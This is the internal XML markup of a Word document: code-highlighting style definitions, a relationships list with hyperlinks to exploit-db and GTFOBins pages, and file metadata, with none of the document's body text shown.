      <w:color w:val="0000CF"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FloatTok">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0000CF"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ConstantTok">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4E9A06"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4E9A06"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimStringTok">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4E9A06"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4E9A06"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportTok">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentationTok">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AnnotationTok">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentVarTok">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VariableTok">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="204A87"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OperatorTok">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="CE5C00"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PreprocessorTok">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="C4A000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RegionMarkerTok">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InformationTok">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WarningTok">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="8F5902"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AlertTok">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="EF2929"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="A40000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00DB5768"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5768"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5768"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5768"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00DB5768"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5768"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00DB576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exploit-db.com/exploits/28718"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tfobins.github.io/gtfobins/man/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/2404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xploit-db.com/exploits/25849"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www.exploit-db.com/exploits/31173"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tfobins.github.io/gtfobins/tar/"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73272-18FD-4423-B8D1-E1C2AD32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6568</Words>
  <Characters>37442</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>312</Lines>
  <Paragraphs>87</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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2020-05-07T14:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-07T14:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>